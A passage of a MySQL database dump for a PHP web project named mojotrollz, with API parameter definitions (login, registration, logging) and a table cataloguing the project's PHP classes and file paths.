'username', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (300, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_security', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (222, 42, 3, 220, NULL, 'db', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (221, 42, 3, 220, NULL, 'filter', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (220, 42, 0, 200, 'stats', 'name', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (210, 42, 3, 200, 'error', 'error', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (203, 42, 3, 200, 'filter', 'page', 'UINT0'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (202, 42, 3, 200, 'filter', 'search', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (201, 42, 3, 200, 'filter', 'filter', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (200, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_log', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (113, 42, 3, 100, 'register', 'locale', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (112, 42, 2, 100, 'register', 'email', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (111, 42, 2, 100, 'register', 'password', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (110, 42, 2, 100, 'register', 'username', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (103, 42, 2, 100, 'login', 'password_md5', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (102, 42, 2, 100, 'login', 'password_sha', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (101, 42, 2, 100, 'login', 'username', 'ALL'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (100, 42, 0, 0, '_SYSTEM_SAI_saimod_sys_login', 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (92, 42, 4, -1, NULL, '_escaped_fragment_', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (91, 42, 4, -1, NULL, '_result', 'RESULT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (140, 0, 2, 10, 'positions', 'type', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (141, 0, 3, 10, 'positions', 'map', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (150, 0, 2, 10, 'tooltip', 'type', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (151, 0, 2, 10, 'tooltip', 'id', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (142, 0, 3, 10, 'positions', 'entry', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (160, 0, 2, 10, 'topic_create', 'parent_type', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (161, 0, 2, 10, 'topic_create', 'parent_id', 'INT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (163, 0, 2, 10, 'topic_create', 'relationflag', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (164, 0, 2, 10, 'topic_create', 'title', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (165, 0, 2, 10, 'topic_create', 'text', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (166, 0, 2, 10, 'topic_create', 'link', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (180, 0, 2, 10, 'topic_tag', 'type', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (181, 0, 2, 10, 'topic_tag', 'value', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (90, 42, 4, -1, NULL, '_lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (61, 42, 2, 10, 'bug', 'data', 'JSON'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (60, 42, 2, 10, 'bug', 'message', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (56, 42, 2, 55, NULL, 'group', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (55, 42, 1, 50, NULL, 'css', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (53, 42, 2, 51, NULL, 'group', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (52, 42, 1, 50, NULL, 'js', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (51, 42, 2, 10, 'pages', 'state', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (50, 42, 2, 10, 'pages', 'group', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (41, 42, 2, 40, 'text', 'lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (40, 42, 2, 10, 'text', 'request', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (31, 42, 3, 10, 'files', 'id', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (30, 42, 2, 10, 'files', 'cat', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (27, 42, 2, 11, 'create', 'locale', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (26, 42, 2, 11, 'create', 'email', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (25, 42, 2, 11, 'create', 'password_sha', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (24, 42, 2, 11, 'create', 'username', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (23, 42, 2, 11, 'check', 'rightid', 'UINT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (22, 42, 2, 11, 'login', 'password_md5', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (21, 42, 2, 11, 'login', 'password_sha', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (20, 42, 2, 11, 'login', 'username', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (11, 42, 0, 10, NULL, 'action', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (10, 42, 0, -1, NULL, 'call', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (2, 42, 1, 0, NULL, 'css', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (1, 42, 1, 0, NULL, 'js', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (0, 42, 0, -1, NULL, 'sai_mod', NULL); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (28, 0, 2, 11, 'create', 'betacode', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (29, 0, 2, 11, 'create', 'wow_password', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (51, 0, 2, 10, 'pages', 'state', 'STRING'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (90, 0, 4, -1, NULL, '_lang', 'LANG'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (91, 0, 4, -1, NULL, '_result', 'RESULT'); INSERT INTO `system_api` (`ID`, `group`, `type`, `parentID`, `parentValue`, `name`, `verify`) VALUES (92, 0, 4, -1, NULL, '_escaped_fragment_', 'STRING'); /*!40000 ALTER TABLE `system_api` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_cache CREATE TABLE IF NOT EXISTS `system_cache` ( `ID` int(10) NOT NULL AUTO_INCREMENT, `CacheID` int(10) NOT NULL, `Ident` char(255) NOT NULL, `data` binary(255) NOT NULL, PRIMARY KEY (`ID`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; -- Exportiere Daten aus Tabelle host_mojotrollz.system_cache: 0 rows /*!40000 ALTER TABLE `system_cache` DISABLE KEYS */; /*!40000 ALTER TABLE `system_cache` ENABLE KEYS */; -- Exportiere Struktur von Tabelle host_mojotrollz.system_code_docu_class CREATE TABLE IF NOT EXISTS `system_code_docu_class` ( `class` char(255) NOT NULL, `name` char(255) NOT NULL, `namespace` char(255) DEFAULT NULL, `text` int(11) DEFAULT NULL, `dead` tinyint(1) NOT NULL, `line_start` int(10) unsigned NOT NULL, `line_end` int(10) unsigned NOT NULL, `file` text NOT NULL, `abstract` tinyint(1) NOT NULL, `final` tinyint(1) NOT NULL, `instantiable` tinyint(1) NOT NULL, `interface` tinyint(1) NOT NULL, `internal` tinyint(1) NOT NULL, `iterateable` tinyint(1) NOT NULL, `userdefined` tinyint(1) NOT NULL, PRIMARY KEY (`class`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- Exportiere Daten aus Tabelle host_mojotrollz.system_code_docu_class: 229 rows /*!40000 ALTER TABLE `system_code_docu_class` DISABLE KEYS */; INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('api_mojotrollz', 'api_mojotrollz', '', NULL, 0, 3, 3, '/home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DBD\\mangos_world', 'mangos_world', 'DBD', NULL, 0, 4, 8, '/home/web/webdir/mojotrollz/mojotrollz/dbd/db/mangos_world.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DBD\\mojotrollz', 'mojotrollz', 'DBD', NULL, 0, 4, 8, '/home/web/webdir/mojotrollz/mojotrollz/dbd/db/mojotrollz.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DBD\\locale_string', 'locale_string', 'DBD', NULL, 0, 5, 11, '/home/web/webdir/mojotrollz/mojotrollz/dbd/tbl/locale_string.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('DBD\\mangos_chars', 'mangos_chars', 'DBD', NULL, 0, 4, 8, '/home/web/webdir/mojotrollz/mojotrollz/dbd/db/mangos_chars.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('user_guild', 'user_guild', '', NULL, 0, 3, 25, '/home/web/webdir/mojotrollz/mojotrollz/page/user_guild/user_guild.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('default_navbar', 'default_navbar', '', NULL, 0, 3, 18, '/home/web/webdir/mojotrollz/mojotrollz/page/default_navbar/default_navbar.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('user_news', 'user_news', '', NULL, 0, 3, 22, '/home/web/webdir/mojotrollz/mojotrollz/page/user_news/user_news.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('wizard_spawn', 'wizard_spawn', '', NULL, 0, 3, 25, '/home/web/webdir/mojotrollz/mojotrollz/page/wizard_spawn/wizard_spawn.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('wizard_reg', 'wizard_reg', '', NULL, 0, 3, 25, '/home/web/webdir/mojotrollz/mojotrollz/page/wizard_reg/wizard_reg.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('wizard_friend', 'wizard_friend', '', NULL, 0, 3, 44, '/home/web/webdir/mojotrollz/mojotrollz/page/wizard_friend/wizard_friend.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('wizard_details', 'wizard_details', '', NULL, 0, 3, 25, '/home/web/webdir/mojotrollz/mojotrollz/page/wizard_details/wizard_details.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PLIB', 'PLIB', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PLIB.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PBOOTSTRAP', 'PBOOTSTRAP', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PBOOTSTRAP.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('page_mojotrollz', 'page_mojotrollz', '', NULL, 0, 3, 40, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('default_page', 'default_page', '', NULL, 0, 3, 31, '/home/web/webdir/mojotrollz/mojotrollz/page/default_page/default_page.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PCRYPTOSHA', 'PCRYPTOSHA', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PCRYPTOSHA.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PPAGE', 'PPAGE', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PPAGE.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PJQUERY', 'PJQUERY', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PJQUERY.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('JQQTIP', 'JQQTIP', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/JQQTIP.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PSAI', 'PSAI', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PSAI.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Michelf\\Markdown', 'Markdown', 'Michelf', NULL, 0, 20, 1512, '/home/web/webdir/system/lib/Michelf/Markdown.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Michelf\\_MarkdownExtra_TmpImpl', '_MarkdownExtra_TmpImpl', 'Michelf', NULL, 0, 1527, 3093, '/home/web/webdir/system/lib/Michelf/Markdown.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PVALIDATION', 'PVALIDATION', '', NULL, 0, 2, 5, '/home/web/webdir/mojotrollz/mojotrollz/path/PVALIDATION.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Michelf\\MarkdownExtra', 'MarkdownExtra', 'Michelf', NULL, 0, 30, 37, '/home/web/webdir/system/lib/Michelf/MarkdownExtra.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_docu', 'saimod_sys_docu', 'SYSTEM\\SAI', NULL, 0, 4, 53, '/home/web/webdir/system/sai/modules/saimod_sys_docu/saimod_sys_docu.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_login', 'saimod_sys_login', 'SYSTEM\\SAI', NULL, 0, 5, 58, '/home/web/webdir/system/sai/modules/saimod_sys_login/saimod_sys_login.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_locale', 'saimod_sys_locale', 'SYSTEM\\SAI', NULL, 0, 4, 141, '/home/web/webdir/system/sai/modules/saimod_sys_locale/saimod_sys_locale.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_img', 'saimod_sys_img', 'SYSTEM\\SAI', NULL, 0, 4, 56, '/home/web/webdir/system/sai/modules/saimod_sys_img/saimod_sys_img.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_cache', 'saimod_sys_cache', 'SYSTEM\\SAI', NULL, 0, 4, 48, '/home/web/webdir/system/sai/modules/saimod_sys_cache/saimod_sys_cache.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_todo', 'saimod_sys_todo', 'SYSTEM\\SAI', NULL, 0, 4, 94, '/home/web/webdir/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_config', 'saimod_sys_config', 'SYSTEM\\SAI', NULL, 0, 4, 41, '/home/web/webdir/system/sai/modules/saimod_sys_config/saimod_sys_config.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_api', 'saimod_sys_api', 'SYSTEM\\SAI', NULL, 0, 4, 81, '/home/web/webdir/system/sai/modules/saimod_sys_api/saimod_sys_api.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_sai', 'saimod_sys_sai', 'SYSTEM\\SAI', NULL, 0, 5, 13, '/home/web/webdir/system/sai/modules/saimod_sys_sai/saimod_sys_sai.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_log', 'saimod_sys_log', 'SYSTEM\\SAI', NULL, 0, 4, 572, '/home/web/webdir/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_security', 'saimod_sys_security', 'SYSTEM\\SAI', NULL, 0, 4, 107, '/home/web/webdir/system/sai/modules/saimod_sys_security/saimod_sys_security.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\saimod_sys_mod', 'saimod_sys_mod', 'SYSTEM\\SAI', NULL, 0, 4, 44, '/home/web/webdir/system/sai/modules/saimod_sys_mod/saimod_sys_mod.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\CACHE\\cache', 'cache', 'SYSTEM\\CACHE', NULL, 0, 5, 45, '/home/web/webdir/system/cache/cache.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\sai', 'sai', 'SYSTEM\\SAI', NULL, 0, 5, 28, '/home/web/webdir/system/sai/sai/sai.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SAI\\SaiModule', 'SaiModule', 'SYSTEM\\SAI', NULL, 0, 5, 19, '/home/web/webdir/system/sai/sai/SaiModule.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SECURITY\\Security', 'Security', 'SYSTEM\\SECURITY', NULL, 0, 5, 296, '/home/web/webdir/system/security/Security.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SECURITY\\RIGHTS', 'RIGHTS', 'SYSTEM\\SECURITY', NULL, 0, 5, 13, '/home/web/webdir/system/security/RIGHTS.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\SECURITY\\User', 'User', 'SYSTEM\\SECURITY', NULL, 0, 5, 28, '/home/web/webdir/system/security/User.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ResultMysqliPrepare', 'ResultMysqliPrepare', 'SYSTEM\\DB', NULL, 0, 5, 56, '/home/web/webdir/system/db/result/ResultMysqliPrepare.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, 